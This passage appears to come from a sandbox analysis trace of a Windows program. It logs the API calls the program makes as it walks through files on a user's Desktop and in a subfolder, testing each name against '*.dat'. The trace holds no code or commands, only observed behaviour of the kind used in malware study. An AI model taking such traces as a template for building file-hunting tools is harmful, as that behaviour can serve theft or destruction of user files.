lpWideCharStr="*.dat") returned 6 [0110.738] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaaf8 | out: hHeap=0x29a0000) returned 1 [0110.738] PathMatchSpecW (pszFile="KTOu", pszSpec="*.dat") returned 0 [0110.738] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.739] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59203b50, ftCreationTime.dwHighDateTime=0x1d7aa27, ftLastAccessTime.dwLowDateTime=0x89c45de0, ftLastAccessTime.dwHighDateTime=0x1d7aeaa, ftLastWriteTime.dwLowDateTime=0x89c45de0, ftLastWriteTime.dwHighDateTime=0x1d7aeaa, nFileSizeHigh=0x0, nFileSizeLow=0xac61, dwReserved0=0x0, dwReserved1=0x0, cFileName="LyMn8DqKE.jpg", cAlternateFileName="LYMN8D~1.JPG")) returned 1 [0110.739] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.739] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.739] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="LyMn8DqKE.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg" [0110.739] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.739] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.740] lstrcatW (in: lpString1="\\", lpString2="LyMn8DqKE.jpg" | out: lpString1="\\LyMn8DqKE.jpg") returned="\\LyMn8DqKE.jpg" [0110.740] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.740] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x39700d0 [0110.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg", lpUsedDefaultChar=0x0) returned 45 [0110.740] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.740] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.740] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.740] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aab28 [0110.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aab28, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.740] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab28 | out: hHeap=0x29a0000) returned 1 [0110.740] PathMatchSpecW (pszFile="LyMn8DqKE.jpg", pszSpec="*.dat") returned 0 [0110.740] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.740] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39c99910, ftCreationTime.dwHighDateTime=0x1d7af1b, ftLastAccessTime.dwLowDateTime=0x44bbdf10, ftLastAccessTime.dwHighDateTime=0x1d7af4b, ftLastWriteTime.dwLowDateTime=0x44bbdf10, ftLastWriteTime.dwHighDateTime=0x1d7af4b, nFileSizeHigh=0x0, nFileSizeLow=0x6aba, dwReserved0=0x0, dwReserved1=0x0, cFileName="MB3JQQUgbwGVRNgeCA.gif", cAlternateFileName="MB3JQQ~1.GIF")) returned 1 [0110.740] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.740] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.740] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="MB3JQQUgbwGVRNgeCA.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif" [0110.740] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.740] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.740] lstrcatW (in: lpString1="\\", lpString2="MB3JQQUgbwGVRNgeCA.gif" | out: lpString1="\\MB3JQQUgbwGVRNgeCA.gif") returned="\\MB3JQQUgbwGVRNgeCA.gif" [0110.740] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0110.740] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x36) returned 0x38ea5d8 [0110.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif", cchWideChar=54, lpMultiByteStr=0x38ea5d8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif", lpUsedDefaultChar=0x0) returned 54 [0110.740] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a50 [0110.740] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea5d8 | out: hHeap=0x29a0000) returned 1 [0110.740] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.741] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaaf8 [0110.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aaaf8, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.741] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaaf8 | out: hHeap=0x29a0000) returned 1 [0110.741] PathMatchSpecW (pszFile="MB3JQQUgbwGVRNgeCA.gif", pszSpec="*.dat") returned 0 [0110.741] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a50 | out: hHeap=0x29a0000) returned 1 [0110.741] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53c41370, ftCreationTime.dwHighDateTime=0x1d7ae73, ftLastAccessTime.dwLowDateTime=0x50a541d0, ftLastAccessTime.dwHighDateTime=0x1d7af24, ftLastWriteTime.dwLowDateTime=0x50a541d0, ftLastWriteTime.dwHighDateTime=0x1d7af24, nFileSizeHigh=0x0, nFileSizeLow=0x17a6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="O93_HCF.xlsx", cAlternateFileName="O93_HC~1.XLS")) returned 1 [0110.741] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.741] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.741] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="O93_HCF.xlsx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx" [0110.741] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.741] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.741] lstrcatW (in: lpString1="\\", lpString2="O93_HCF.xlsx" | out: lpString1="\\O93_HCF.xlsx") returned="\\O93_HCF.xlsx" [0110.741] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0110.741] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2c) returned 0x39700d0 [0110.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx", cchWideChar=44, lpMultiByteStr=0x39700d0, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx", lpUsedDefaultChar=0x0) returned 44 [0110.741] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.741] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.741] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.745] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaba0 [0110.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aaba0, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.745] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaba0 | out: hHeap=0x29a0000) returned 1 [0110.745] PathMatchSpecW (pszFile="O93_HCF.xlsx", pszSpec="*.dat") returned 0 [0110.745] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.745] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x212b71d0, ftCreationTime.dwHighDateTime=0x1d7a377, ftLastAccessTime.dwLowDateTime=0xbbf74c40, ftLastAccessTime.dwHighDateTime=0x1d7ac26, ftLastWriteTime.dwLowDateTime=0xbbf74c40, ftLastWriteTime.dwHighDateTime=0x1d7ac26, nFileSizeHigh=0x0, nFileSizeLow=0x4735, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oar504.gif", cAlternateFileName="")) returned 1 [0110.745] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.745] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.745] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="Oar504.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif" [0110.745] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.745] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.745] lstrcatW (in: lpString1="\\", lpString2="Oar504.gif" | out: lpString1="\\Oar504.gif") returned="\\Oar504.gif" [0110.745] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.745] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2a) returned 0x39700d0 [0110.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif", cchWideChar=42, lpMultiByteStr=0x39700d0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif", lpUsedDefaultChar=0x0) returned 42 [0110.746] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.746] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.746] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.746] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aab40 [0110.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aab40, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.746] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab40 | out: hHeap=0x29a0000) returned 1 [0110.746] PathMatchSpecW (pszFile="Oar504.gif", pszSpec="*.dat") returned 0 [0110.746] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.746] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="p B1LdDcHaeS", cAlternateFileName="PB1LDD~1")) returned 1 [0110.746] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.746] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.746] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.746] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.746] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.746] lstrcatW (in: lpString1="\\", lpString2="p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.746] lstrcmpW (lpString1="p B1LdDcHaeS", lpString2=".") returned 1 [0110.746] lstrcmpW (lpString1="p B1LdDcHaeS", lpString2="..") returned 1 [0110.746] lstrcpyW (in: lpString1=0x19c8c0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.746] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\*.*" [0110.746] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\*.*", lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743320 [0110.746] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.746] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.746] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\." [0110.746] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.747] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.747] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="." | out: lpString1="\\p B1LdDcHaeS\\.") returned="\\p B1LdDcHaeS\\." [0110.747] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.747] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.747] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.747] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.747] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\.." [0110.747] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.747] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.747] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2=".." | out: lpString1="\\p B1LdDcHaeS\\..") returned="\\p B1LdDcHaeS\\.." [0110.747] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.747] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.747] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c5cc6e0, ftCreationTime.dwHighDateTime=0x1d7a2e8, ftLastAccessTime.dwLowDateTime=0x5ed18130, ftLastAccessTime.dwHighDateTime=0x1d7a4a0, ftLastWriteTime.dwLowDateTime=0x5ed18130, ftLastWriteTime.dwHighDateTime=0x1d7a4a0, nFileSizeHigh=0x0, nFileSizeLow=0x34c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="6eLLiqLz9t.avi", cAlternateFileName="6ELLIQ~1.AVI")) returned 1 [0110.747] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.747] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.747] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="6eLLiqLz9t.avi" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi" [0110.747] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.747] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.747] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="6eLLiqLz9t.avi" | out: lpString1="\\p B1LdDcHaeS\\6eLLiqLz9t.avi") returned="\\p B1LdDcHaeS\\6eLLiqLz9t.avi" [0110.747] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.748] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a28e8 [0110.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi", cchWideChar=59, lpMultiByteStr=0x29a28e8, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi", lpUsedDefaultChar=0x0) returned 59 [0110.748] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2e88 [0110.748] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a28e8 | out: hHeap=0x29a0000) returned 1 [0110.748] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.748] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac30 [0110.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aac30, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.748] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac30 | out: hHeap=0x29a0000) returned 1 [0110.748] PathMatchSpecW (pszFile="6eLLiqLz9t.avi", pszSpec="*.dat") returned 0 [0110.748] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2e88 | out: hHeap=0x29a0000) returned 1 [0110.748] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe18e7860, ftCreationTime.dwHighDateTime=0x1d7a074, ftLastAccessTime.dwLowDateTime=0x48a8aa90, 